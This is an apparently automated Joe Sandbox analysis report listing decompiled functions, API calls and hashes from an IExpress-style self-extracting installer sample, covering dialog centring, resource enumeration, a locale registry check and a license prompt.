                                                • Source File: 00000001.00000002.387093394.0000000001061000.00000020.00000001.01000000.00000004.sdmp, Offset: 01060000, based on PE: true
                                                • Associated: 00000001.00000002.387064424.0000000001060000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000001.00000002.387162603.0000000001068000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000001.00000002.387173888.000000000106A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000001.00000002.387173888.000000000106C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_1060000_will6283.jbxd
                                                Similarity
                                                • API ID: FreeLibrary$AddressAllocateInitializeLoadProc
                                                • String ID: CheckTokenMembership$advapi32.dll
                                                • API String ID: 4204503880-1888249752
                                                • Opcode ID: 89d0febd681f4c349a4bdffd620d8c3a04672ae601fc3846ff413c9ed87e48f6
                                                • Instruction ID: 6f8d8092094e1c761aa2e33ab2dc257855971c233cfcb68d7eea5f323a485249
                                                • Opcode Fuzzy Hash: 89d0febd681f4c349a4bdffd620d8c3a04672ae601fc3846ff413c9ed87e48f6
                                                • Instruction Fuzzy Hash: A4119371F00209EFEB20AFA4DC49ABEBBBCEF84700F100569FA41E7250DA359D008B90
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E01063450(struct HWND__* _a4, intOrPtr _a8, int _a12) {
                                                				void* _t7;
                                                				void* _t11;
                                                				struct HWND__* _t12;
                                                				int _t22;
                                                				struct HWND__* _t24;
                                                
                                                				_t7 = _a8 - 0x10;
                                                				if(_t7 == 0) {
                                                					EndDialog(_a4, 2);
                                                					L11:
                                                					return 1;
                                                				}
                                                				_t11 = _t7 - 0x100;
                                                				if(_t11 == 0) {
                                                					_t12 = GetDesktopWindow();
                                                					_t24 = _a4;
                                                					E010643D0(_t24, _t12);
                                                					SetWindowTextA(_t24, "lega");
                                                					SetDlgItemTextA(_t24, 0x838,  *0x1069404);
                                                					SetForegroundWindow(_t24);
                                                					goto L11;
                                                				}
                                                				if(_t11 == 1) {
                                                					_t22 = _a12;
                                                					if(_t22 < 6) {
                                                						goto L11;
                                                					}
                                                					if(_t22 <= 7) {
                                                						L8:
                                                						EndDialog(_a4, _t22);
                                                						return 1;
                                                					}
                                                					if(_t22 != 0x839) {
                                                						goto L11;
                                                					}
                                                					 *0x10691dc = 1;
                                                					goto L8;
                                                				}
                                                				return 0;
                                                			}








                                                0x01063459
                                                0x0106345c
                                                0x010634d8
                                                0x010634de
                                                0x00000000
                                                0x010634e0
                                                0x0106345e
                                                0x01063463
                                                0x0106349a
                                                0x010634a0
                                                0x010634a7
                                                0x010634b2
                                                0x010634c4
                                                0x010634cb
                                                0x00000000
                                                0x010634cb
                                                0x01063468
                                                0x0106346e
                                                0x01063474
                                                0x00000000
                                                0x00000000
                                                0x0106347c
                                                0x0106348c
                                                0x01063490
                                                0x00000000
                                                0x01063496
                                                0x01063484
                                                0x00000000
                                                0x00000000
                                                0x01063486
                                                0x00000000
                                                0x01063486
                                                0x00000000

                                                APIs
                                                • EndDialog.USER32(?,?), ref: 01063490
                                                • GetDesktopWindow.USER32 ref: 0106349A
                                                • SetWindowTextA.USER32(?,lega), ref: 010634B2
                                                • SetDlgItemTextA.USER32(?,00000838), ref: 010634C4
                                                • SetForegroundWindow.USER32(?), ref: 010634CB
                                                • EndDialog.USER32(?,00000002), ref: 010634D8
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.387093394.0000000001061000.00000020.00000001.01000000.00000004.sdmp, Offset: 01060000, based on PE: true
                                                • Associated: 00000001.00000002.387064424.0000000001060000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000001.00000002.387162603.0000000001068000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000001.00000002.387173888.000000000106A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000001.00000002.387173888.000000000106C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_1060000_will6283.jbxd
                                                Similarity
                                                • API ID: Window$DialogText$DesktopForegroundItem
                                                • String ID: lega
                                                • API String ID: 852535152-245445314
                                                • Opcode ID: c63b926b48f9498ce90e4272c976d495f67b5643a6ddb0d9f74fee150b696c19
                                                • Instruction ID: def09124d366514ebd39fa3f5d80a255baa6d43cb21167aa3cdd6b788d9d6ae4
                                                • Opcode Fuzzy Hash: c63b926b48f9498ce90e4272c976d495f67b5643a6ddb0d9f74fee150b696c19
                                                • Instruction Fuzzy Hash: C401B535740114EBD7266F69D80C96DBB98FF05750B004014FACA9F9A4CF36A951C7C0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 95%
                                                			E01062AAC(CHAR* __ecx, char* __edx, CHAR* _a4) {
                                                				signed int _v8;
                                                				char _v268;
                                                				void* __ebx;
                                                				void* __edi;
                                                				void* __esi;
                                                				signed int _t16;
                                                				int _t21;
                                                				char _t32;
                                                				intOrPtr _t34;
                                                				char* _t38;
                                                				char _t42;
                                                				char* _t44;
                                                				CHAR* _t52;
                                                				intOrPtr* _t55;
                                                				CHAR* _t59;
                                                				void* _t62;
                                                				CHAR* _t64;
                                                				CHAR* _t65;
                                                				signed int _t66;
                                                
                                                				_t60 = __edx;
                                                				_t16 =  *0x1068004; // 0x19e58fb5
                                                				_t17 = _t16 ^ _t66;
                                                				_v8 = _t16 ^ _t66;
                                                				_t65 = _a4;
                                                				_t44 = __edx;
                                                				_t64 = __ecx;
                                                				if( *((char*)(__ecx)) != 0) {
                                                					GetModuleFileNameA( *0x1069a3c,  &_v268, 0x104);
                                                					while(1) {
                                                						_t17 =  *_t64;
                                                						if(_t17 == 0) {
                                                							break;
                                                						}
                                                						_t21 = IsDBCSLeadByte(_t17);
                                                						 *_t65 =  *_t64;
                                                						if(_t21 != 0) {
                                                							_t65[1] = _t64[1];
                                                						}
                                                						if( *_t64 != 0x23) {
                                                							L19:
                                                							_t65 = CharNextA(_t65);
                                                						} else {
                                                							_t64 = CharNextA(_t64);
                                                							if(CharUpperA( *_t64) != 0x44) {
                                                								if(CharUpperA( *_t64) != 0x45) {
                                                									if( *_t64 == 0x23) {
                                                										goto L19;
                                                									}
                                                								} else {
                                                									E01061680(_t65, E010617C8(_t44, _t65),  &_v268);
                                                									_t52 = _t65;
                                                									_t14 =  &(_t52[1]); // 0x2
                                                									_t60 = _t14;
                                                									do {
                                                										_t32 =  *_t52;
                                                										_t52 =  &(_t52[1]);
                                                									} while (_t32 != 0);
                                                									goto L17;
                                                								}
                                                							} else {
                                                								E010665E8( &_v268);
                                                								_t55 =  &_v268;
                                                								_t62 = _t55 + 1;
                                                								do {
                                                									_t34 =  *_t55;
                                                									_t55 = _t55 + 1;
                                                								} while (_t34 != 0);
                                                								_t38 = CharPrevA( &_v268,  &(( &_v268)[_t55 - _t62]));
                                                								if(_t38 != 0 &&  *_t38 == 0x5c) {
                                                									 *_t38 = 0;
                                                								}
                                                								E01061680(_t65, E010617C8(_t44, _t65),  &_v268);
                                                								_t59 = _t65;
                                                								_t12 =  &(_t59[1]); // 0x2
                                                								_t60 = _t12;
                                                								do {
                                                									_t42 =  *_t59;
                                                									_t59 =  &(_t59[1]);
                                                								} while (_t42 != 0);
                                                								L17:
                                                								_t65 =  &(_t65[_t52 - _t60]);
                                                							}
                                                						}
                                                						_t64 = CharNextA(_t64);
                                                					}
                                                					 *_t65 = _t17;
                                                				}
                                                				return E01066CE0(_t17, _t44, _v8 ^ _t66, _t60, _t64, _t65);
                                                			}






















                                                0x01062aac
                                                0x01062ab7
                                                0x01062abc
                                                0x01062abe
                                                0x01062ac3
                                                0x01062ac6
                                                0x01062ac9
                                                0x01062ace
                                                0x01062ae6
                                                0x01062bdc
                                                0x01062bdc
                                                0x01062be0
                                                0x00000000
                                                0x00000000
                                                0x01062af2
                                                0x01062afc
                                                0x01062b00
                                                0x01062b05
                                                0x01062b05
                                                0x01062b0b
                                                0x01062bca
                                                0x01062bd1
                                                0x01062b11
                                                0x01062b18
                                                0x01062b26
                                                0x01062b99
                                                0x01062bc8
                                                0x00000000
                                                0x00000000
                                                0x01062b9b
                                                0x01062bae
                                                0x01062bb3
                                                0x01062bb5
                                                0x01062bb5
                                                0x01062bb8
                                                0x01062bb8
                                                0x01062bba
                                                0x01062bbb
                                                0x00000000
                                                0x01062bb8
                                                0x01062b28
                                                0x01062b2e
                                                0x01062b33
                                                0x01062b39
                                                0x01062b3c
                                                0x01062b3c
                                                0x01062b3e
                                                0x01062b3f
                                                0x01062b55
                                                0x01062b5d
                                                0x01062b64
                                                0x01062b64
                                                0x01062b7a
                                                0x01062b7f
                                                0x01062b81
                                                0x01062b81
                                                0x01062b84
                                                0x01062b84
                                                0x01062b86
                                                0x01062b87
                                                0x01062bbf
                                                0x01062bc1
                                                0x01062bc1
                                                0x01062b26
                                                0x01062bda
                                                0x01062bda
                                                0x01062be6
                                                0x01062be6
                                                0x01062bf8

                                                APIs
                                                • GetModuleFileNameA.KERNEL32(?,00000104,00000000,00000000,?), ref: 01062AE6
                                                • IsDBCSLeadByte.KERNEL32(00000000), ref: 01062AF2
                                                • CharNextA.USER32(?), ref: 01062B12
                                                • CharUpperA.USER32 ref: 01062B1E
                                                • CharPrevA.USER32(?,?), ref: 01062B55
                                                • CharNextA.USER32(?), ref: 01062BD4
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.387093394.0000000001061000.00000020.00000001.01000000.00000004.sdmp, Offset: 01060000, based on PE: true
                                                • Associated: 00000001.00000002.387064424.0000000001060000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000001.00000002.387162603.0000000001068000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000001.00000002.387173888.000000000106A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000001.00000002.387173888.000000000106C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_1060000_will6283.jbxd
                                                Similarity
                                                • API ID: Char$Next$ByteFileLeadModuleNamePrevUpper
                                                • String ID:
                                                • API String ID: 571164536-0
                                                • Opcode ID: 8d6be79d86971c33490714cd2a5cebf6c0c74f088f5cc8fce406dab3cee393e7
                                                • Instruction ID: 75af56031f99a468eb82f1dc5ca3b477290488c0c4cc9efed560a628c740f9fb
                                                • Opcode Fuzzy Hash: 8d6be79d86971c33490714cd2a5cebf6c0c74f088f5cc8fce406dab3cee393e7
                                                • Instruction Fuzzy Hash: 914118346042459FDB66AF389854AFD7FADDF56350F0400DAD8C297202DB7A5A46CBA0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 86%
                                                			E010643D0(struct HWND__* __ecx, struct HWND__* __edx) {
                                                				signed int _v8;
                                                				struct tagRECT _v24;
                                                				struct tagRECT _v40;
                                                				struct HWND__* _v44;
                                                				intOrPtr _v48;
                                                				int _v52;
                                                				intOrPtr _v56;
                                                				int _v60;
                                                				void* __ebx;
                                                				void* __edi;
                                                				void* __esi;
                                                				signed int _t29;
                                                				void* _t53;
                                                				intOrPtr _t56;
                                                				int _t59;
                                                				struct HWND__* _t63;
                                                				struct HWND__* _t67;
                                                				struct HWND__* _t68;
                                                				struct HDC__* _t69;
                                                				int _t72;
                                                				signed int _t74;
                                                
                                                				_t63 = __edx;
                                                				_t29 =  *0x1068004; // 0x19e58fb5
                                                				_v8 = _t29 ^ _t74;
                                                				_t68 = __edx;
                                                				_v44 = __ecx;
                                                				GetWindowRect(__ecx,  &_v40);
                                                				_t53 = _v40.bottom - _v40.top;
                                                				_v48 = _v40.right - _v40.left;
                                                				GetWindowRect(_t68,  &_v24);
                                                				_v56 = _v24.bottom - _v24.top;
                                                				_t69 = GetDC(_v44);
                                                				_v52 = GetDeviceCaps(_t69, 8);
                                                				_v60 = GetDeviceCaps(_t69, 0xa);
                                                				ReleaseDC(_v44, _t69);
                                                				_t56 = _v48;
                                                				asm("cdq");
                                                				_t72 = (_v24.right - _v24.left - _t56 - _t63 >> 1) + _v24.left;
                                                				_t67 = 0;
                                                				if(_t72 >= 0) {
                                                					_t63 = _v52;
                                                					if(_t72 + _t56 > _t63) {
                                                						_t72 = _t63 - _t56;
                                                					}
                                                				} else {
                                                					_t72 = _t67;
                                                				}
                                                				asm("cdq");
                                                				_t59 = (_v56 - _t53 - _t63 >> 1) + _v24.top;
                                                				if(_t59 >= 0) {
                                                					_t63 = _v60;
                                                					if(_t59 + _t53 > _t63) {
                                                						_t59 = _t63 - _t53;
                                                					}
                                                				} else {
                                                					_t59 = _t67;
                                                				}
                                                				return E01066CE0(SetWindowPos(_v44, _t67, _t72, _t59, _t67, _t67, 5), _t53, _v8 ^ _t74, _t63, _t67, _t72);
                                                			}
























                                                0x010643d0
                                                0x010643d8
                                                0x010643df
                                                0x010643e6
                                                0x010643ec
                                                0x010643f1
                                                0x01064400
                                                0x01064403
                                                0x0106440b
                                                0x01064420
                                                0x01064429
                                                0x01064437
                                                0x01064444
                                                0x01064447
                                                0x0106444d
                                                0x01064454
                                                0x0106445b
                                                0x01064460
                                                0x01064461
                                                0x01064467
                                                0x0106446f
                                                0x01064473
                                                0x01064473
                                                0x01064463
                                                0x01064463
                                                0x01064463
                                                0x0106447a
                                                0x01064481
                                                0x01064484
                                                0x0106448a
                                                0x01064492
                                                0x01064496
                                                0x01064496
                                                0x01064486
                                                0x01064486
                                                0x01064486
                                                0x010644b8

                                                APIs
                                                • GetWindowRect.USER32(?,?), ref: 010643F1
                                                • GetWindowRect.USER32(00000000,?), ref: 0106440B
                                                • GetDC.USER32(?), ref: 01064423
                                                • GetDeviceCaps.GDI32(00000000,00000008), ref: 0106442E
                                                • GetDeviceCaps.GDI32(00000000,0000000A), ref: 0106443A
                                                • ReleaseDC.USER32(?,00000000), ref: 01064447
                                                • SetWindowPos.USER32(?,00000000,?,?,00000000,00000000,00000005,?,?), ref: 010644A2
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.387093394.0000000001061000.00000020.00000001.01000000.00000004.sdmp, Offset: 01060000, based on PE: true
                                                • Associated: 00000001.00000002.387064424.0000000001060000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000001.00000002.387162603.0000000001068000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000001.00000002.387173888.000000000106A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000001.00000002.387173888.000000000106C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_1060000_will6283.jbxd
                                                Similarity
                                                • API ID: Window$CapsDeviceRect$Release
                                                • String ID:
                                                • API String ID: 2212493051-0
                                                • Opcode ID: 02d4ba0bcb51e5896852bfe1c2f3877e8a2387358f733ab64872b860dc7e4a10
                                                • Instruction ID: a3f0430c43c6330d82028e6d33fd240fd35f7705c6b14e9b55d185b6503c108d
                                                • Opcode Fuzzy Hash: 02d4ba0bcb51e5896852bfe1c2f3877e8a2387358f733ab64872b860dc7e4a10
                                                • Instruction Fuzzy Hash: B4314B32F00119EFCB14DFB8D9899EEBBB9EB89310F154169F845F7244DA35AC058B60
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 53%
                                                			E01066298(intOrPtr __ecx, intOrPtr* __edx) {
                                                				signed int _v8;
                                                				char _v28;
                                                				intOrPtr _v32;
                                                				struct HINSTANCE__* _v36;
                                                				void* __ebx;
                                                				void* __edi;
                                                				void* __esi;
                                                				signed int _t16;
                                                				struct HRSRC__* _t21;
                                                				intOrPtr _t26;
                                                				void* _t30;
                                                				struct HINSTANCE__* _t36;
                                                				intOrPtr* _t40;
                                                				void* _t41;
                                                				intOrPtr* _t44;
                                                				intOrPtr* _t45;
                                                				void* _t47;
                                                				signed int _t50;
                                                				struct HINSTANCE__* _t51;
                                                
                                                				_t44 = __edx;
                                                				_t16 =  *0x1068004; // 0x19e58fb5
                                                				_v8 = _t16 ^ _t50;
                                                				_t46 = 0;
                                                				_v32 = __ecx;
                                                				_v36 = 0;
                                                				_t36 = 1;
                                                				E0106171E( &_v28, 0x14, "UPDFILE%lu", 0);
                                                				while(1) {
                                                					_t51 = _t51 + 0x10;
                                                					_t21 = FindResourceA(_t46,  &_v28, 0xa);
                                                					if(_t21 == 0) {
                                                						break;
                                                					}
                                                					_t45 = LockResource(LoadResource(_t46, _t21));
                                                					if(_t45 == 0) {
                                                						 *0x1069124 = 0x80070714;
                                                						_t36 = _t46;
                                                					} else {
                                                						_t5 = _t45 + 8; // 0x8
                                                						_t44 = _t5;
                                                						_t40 = _t44;
                                                						_t6 = _t40 + 1; // 0x9
                                                						_t47 = _t6;
                                                						do {
                                                							_t26 =  *_t40;
                                                							_t40 = _t40 + 1;
                                                						} while (_t26 != 0);
                                                						_t41 = _t40 - _t47;
                                                						_t46 = _t51;
                                                						_t7 = _t41 + 1; // 0xa
                                                						 *0x106a288( *_t45,  *((intOrPtr*)(_t45 + 4)), _t44, _t7 + _t44);
                                                						_t30 = _v32();
                                                						if(_t51 != _t51) {
                                                							asm("int 0x29");
                                                						}
                                                						_push(_t45);
                                                						if(_t30 == 0) {
                                                							_t36 = 0;
                                                							FreeResource(??);
                                                						} else {
                                                							FreeResource();
                                                							_v36 = _v36 + 1;
                                                							E0106171E( &_v28, 0x14, "UPDFILE%lu", _v36 + 1);
                                                							_t46 = 0;
                                                							continue;
                                                						}
                                                					}
                                                					L12:
                                                					return E01066CE0(_t36, _t36, _v8 ^ _t50, _t44, _t45, _t46);
                                                				}
                                                				goto L12;
                                                			}






















                                                0x01066298
                                                0x010662a0
                                                0x010662a7
                                                0x010662ad
                                                0x010662af
                                                0x010662bb
                                                0x010662c3
                                                0x010662c4
                                                0x0106633b
                                                0x0106633b
                                                0x01066345
                                                0x0106634d
                                                0x00000000
                                                0x00000000
                                                0x010662da
                                                0x010662de
                                                0x0106635f
                                                0x01066369
                                                0x010662e0
                                                0x010662e0
                                                0x010662e0
                                                0x010662e3
                                                0x010662e5
                                                0x010662e5
                                                0x010662e8
                                                0x010662e8
                                                0x010662ea
                                                0x010662eb
                                                0x010662ef
                                                0x010662f1
                                                0x010662f3
                                                0x01066302
                                                0x01066308
                                                0x0106630d
                                                0x01066314
                                                0x01066314
                                                0x01066316
                                                0x01066319
                                                0x01066355
                                                0x01066357
                                                0x0106631b
                                                0x0106631b
                                                0x01066331
                                                0x01066334
                                                0x01066339
                                                0x00000000
                                                0x01066339
                                                0x01066319
                                                0x0106636b
                                                0x0106637d
                                                0x0106637d
                                                0x00000000

                                                APIs
                                                  • Part of subcall function 0106171E: _vsnprintf.MSVCRT ref: 01061750
                                                • LoadResource.KERNEL32(00000000,00000000,?,?,00000002,00000000,?,010651CA,00000004,00000024,01062F71,?,00000002,00000000), ref: 010662CD
                                                • LockResource.KERNEL32(00000000,?,?,00000002,00000000,?,010651CA,00000004,00000024,01062F71,?,00000002,00000000), ref: 010662D4
                                                • FreeResource.KERNEL32(00000000,?,?,00000002,00000000,?,010651CA,00000004,00000024,01062F71,?,00000002,00000000), ref: 0106631B
                                                • FindResourceA.KERNEL32(00000000,00000004,0000000A), ref: 01066345
                                                • FreeResource.KERNEL32(00000000,?,?,00000002,00000000,?,010651CA,00000004,00000024,01062F71,?,00000002,00000000), ref: 01066357
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.387093394.0000000001061000.00000020.00000001.01000000.00000004.sdmp, Offset: 01060000, based on PE: true
                                                • Associated: 00000001.00000002.387064424.0000000001060000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000001.00000002.387162603.0000000001068000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000001.00000002.387173888.000000000106A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000001.00000002.387173888.000000000106C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_1060000_will6283.jbxd
                                                Similarity
                                                • API ID: Resource$Free$FindLoadLock_vsnprintf
                                                • String ID: UPDFILE%lu
                                                • API String ID: 2922116661-2329316264
                                                • Opcode ID: 806570c2850de5155539cb446c973470a7a70d71c1a29421a4075c4019ae7506
                                                • Instruction ID: 58b2172035301b1414c70d6a840df527c45fa5e286077804aa4f922e08d549d2
                                                • Opcode Fuzzy Hash: 806570c2850de5155539cb446c973470a7a70d71c1a29421a4075c4019ae7506
                                                • Instruction Fuzzy Hash: 0421D675A00229EFDB20AF65DC459FEBB7CFF44714B044159FA82A7201DB3B99068BE0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 94%
                                                			E0106681F(void* __ebx) {
                                                				signed int _v8;
                                                				char _v20;
                                                				struct _OSVERSIONINFOA _v168;
                                                				void* _v172;
                                                				int* _v176;
                                                				int _v180;
                                                				int _v184;
                                                				void* __edi;
                                                				void* __esi;
                                                				signed int _t19;
                                                				long _t31;
                                                				signed int _t35;
                                                				void* _t36;
                                                				intOrPtr _t41;
                                                				signed int _t44;
                                                
                                                				_t36 = __ebx;
                                                				_t19 =  *0x1068004; // 0x19e58fb5
                                                				_v8 = _t19 ^ _t44;
                                                				_t41 =  *0x10681d8; // 0x0
                                                				_t43 = 0;
                                                				_v180 = 0xc;
                                                				_v176 = 0;
                                                				if(_t41 == 0xfffffffe) {
                                                					 *0x10681d8 = 0;
                                                					_v168.dwOSVersionInfoSize = 0x94;
                                                					if(GetVersionExA( &_v168) == 0) {
                                                						L12:
                                                						_t41 =  *0x10681d8; // 0x0
                                                					} else {
                                                						_t41 = 1;
                                                						if(_v168.dwPlatformId != 1 || _v168.dwMajorVersion != 4 || _v168.dwMinorVersion >= 0xa || GetSystemMetrics(0x4a) == 0 || RegOpenKeyExA(0x80000001, "Control Panel\\Desktop\\ResourceLocale", 0, 0x20019,  &_v172) != 0) {
                                                							goto L12;
                                                						} else {
                                                							_t31 = RegQueryValueExA(_v172, 0x1061140, 0,  &_v184,  &_v20,  &_v180);
                                                							_t43 = _t31;
                                                							RegCloseKey(_v172);
                                                							if(_t31 != 0) {
                                                								goto L12;
                                                							} else {
                                                								_t40 =  &_v176;
                                                								if(E010666F9( &_v20,  &_v176) == 0) {
                                                									goto L12;
                                                								} else {
                                                									_t35 = _v176 & 0x000003ff;
                                                									if(_t35 == 1 || _t35 == 0xd) {
                                                										 *0x10681d8 = _t41;
                                                									} else {
                                                										goto L12;
                                                									}
                                                								}
                                                							}
                                                						}
                                                					}
                                                				}
                                                				return E01066CE0(_t41, _t36, _v8 ^ _t44, _t40, _t41, _t43);
                                                			}


















                                                0x0106681f
                                                0x0106682a
                                                0x01066831
                                                0x01066836
                                                0x0106683c
                                                0x0106683e
                                                0x01066848
                                                0x01066851
                                                0x0106685d
                                                0x01066864
                                                0x01066876
                                                0x0106693a
                                                0x0106693a
                                                0x0106687c
                                                0x0106687e
                                                0x01066885
                                                0x00000000
                                                0x010668d6
                                                0x010668f4
                                                0x01066900
                                                0x01066902
                                                0x0106690a
                                                0x00000000
                                                0x0106690c
                                                0x0106690c
                                                0x0106691c
                                                0x00000000
                                                0x0106691e
                                                0x01066924
                                                0x0106692b
                                                0x01066932
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x0106692b
                                                0x0106691c
                                                0x0106690a
                                                0x01066885
                                                0x01066876
                                                0x01066951

                                                APIs
                                                • GetVersionExA.KERNEL32(?,00000000,00000002), ref: 0106686E
                                                • GetSystemMetrics.USER32(0000004A), ref: 010668A7
                                                • RegOpenKeyExA.ADVAPI32(80000001,Control Panel\Desktop\ResourceLocale,00000000,00020019,?), ref: 010668CC
                                                • RegQueryValueExA.ADVAPI32(?,01061140,00000000,?,?,0000000C), ref: 010668F4
                                                • RegCloseKey.ADVAPI32(?), ref: 01066902
                                                  • Part of subcall function 010666F9: CharNextA.USER32(?,00000001,00000000,00000000,?,?,?,0106691A), ref: 01066741
                                                Strings
                                                • Control Panel\Desktop\ResourceLocale, xrefs: 010668C2
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.387093394.0000000001061000.00000020.00000001.01000000.00000004.sdmp, Offset: 01060000, based on PE: true
                                                • Associated: 00000001.00000002.387064424.0000000001060000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000001.00000002.387162603.0000000001068000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000001.00000002.387173888.000000000106A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000001.00000002.387173888.000000000106C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_1060000_will6283.jbxd
                                                Similarity
                                                • API ID: CharCloseMetricsNextOpenQuerySystemValueVersion
                                                • String ID: Control Panel\Desktop\ResourceLocale
                                                • API String ID: 3346862599-1109908249
                                                • Opcode ID: 5af464c08d9ca2f6ae9168f08f4fc81b18c57efb06b78953e2d5d2386ae52c4d
                                                • Instruction ID: 6d5fb03170a7206c77baf3ea67d2601976199db37e2c3eab87a3569464ae8877
                                                • Opcode Fuzzy Hash: 5af464c08d9ca2f6ae9168f08f4fc81b18c57efb06b78953e2d5d2386ae52c4d
                                                • Instruction Fuzzy Hash: DD315231A40318DFDF319B15DC44BEA77BCEB45768F0041E5E989B6240D73699858FA1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E01063A3F(void* __eflags) {
                                                				void* _t3;
                                                				void* _t9;
                                                				CHAR* _t16;
                                                
                                                				_t16 = "LICENSE";
                                                				_t1 = E0106468F(_t16, 0, 0) + 1; // 0x1
                                                				_t3 = LocalAlloc(0x40, _t1);
                                                				 *0x1068d4c = _t3;
                                                				if(_t3 != 0) {
                                                					_t19 = _t16;
                                                					if(E0106468F(_t16, _t3, _t28) != 0) {
                                                						if(lstrcmpA( *0x1068d4c, "<None>") == 0) {
                                                							LocalFree( *0x1068d4c);
                                                							L9:
                                                							 *0x1069124 = 0;
                                                							return 1;
                                                						}
                                                						_t9 = E01066517(_t19, 0x7d1, 0, E01063100, 0, 0);
                                                						LocalFree( *0x1068d4c);
                                                						if(_t9 != 0) {
                                                							goto L9;
                                                						}
                                                						 *0x1069124 = 0x800704c7;
                                                						L2:
                                                						return 0;
                                                					}
                                                					E010644B9(0, 0x4b1, 0, 0, 0x10, 0);
                                                					LocalFree( *0x1068d4c);
                                                					 *0x1069124 = 0x80070714;
                                                					goto L2;
                                                				}
                                                				E010644B9(0, 0x4b5, 0, 0, 0x10, 0);
                                                				 *0x1069124 = E01066285();
                                                				goto L2;
                                                			}






                                                0x01063a46
                                                0x01063a57
                                                0x01063a5d
                                                0x01063a63
                                                0x01063a6a
                                                0x01063a91
                                                0x01063a9a
                                                0x01063ad8
                                                0x01063b13
                                                0x01063b19
                                                0x01063b1b
                                                0x00000000
                                                0x01063b21
                                                0x01063ae7
                                                0x01063af4
                                                0x01063afc
                                                0x00000000
                                                0x00000000
                                                0x01063afe
                                                0x01063a87
                                                0x00000000
                                                0x01063a87
                                                0x01063aa8
                                                0x01063ab3
                                                0x01063ab9
                                                0x00000000
                                                0x01063ab9
                                                0x01063a78
                                                0x01063a82
                                                0x00000000

                                                APIs
                                                  • Part of subcall function 0106468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 010646A0
                                                  • Part of subcall function 0106468F: SizeofResource.KERNEL32(00000000,00000000,?,01062D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 010646A9
                                                  • Part of subcall function 0106468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 010646C3
                                                  • Part of subcall function 0106468F: LoadResource.KERNEL32(00000000,00000000,?,01062D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 010646CC
                                                  • Part of subcall function 0106468F: LockResource.KERNEL32(00000000,?,01062D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 010646D3
                                                  • Part of subcall function 0106468F: memcpy_s.MSVCRT ref: 010646E5
                                                  • Part of subcall function 0106468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 010646EF
                                                • LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000,01062F64,?,00000002,00000000), ref: 01063A5D
                                                • LocalFree.KERNEL32(00000000,00000000,00000010,00000000,00000000), ref: 01063AB3
                                                  • Part of subcall function 010644B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 01064518
                                                  • Part of subcall function 010644B9: MessageBoxA.USER32(?,?,lega,00010010), ref: 01064554
                                                  • Part of subcall function 01066285: GetLastError.KERNEL32(01065BBC), ref: 01066285
                                                • lstrcmpA.KERNEL32(<None>,00000000), ref: 01063AD0
                                                • LocalFree.KERNEL32 ref: 01063B13
                                                  • Part of subcall function 01066517: FindResourceA.KERNEL32(01060000,000007D6,00000005), ref: 0106652A
                                                  • Part of subcall function 01066517: LoadResource.KERNEL32(01060000,00000000,?,?,01062EE8,00000000,010619E0,00000547,0000083E,?,?,?,?,?,?,?), ref: 01066538
                                                  • Part of subcall function 01066517: DialogBoxIndirectParamA.USER32(01060000,00000000,00000547,010619E0,00000000), ref: 01066557
                                                  • Part of subcall function 01066517: FreeResource.KERNEL32(00000000,?,?,01062EE8,00000000,010619E0,00000547,0000083E,?,?,?,?,?,?,?,00000002), ref: 01066560
                                                • LocalFree.KERNEL32(00000000,01063100,00000000,00000000), ref: 01063AF4
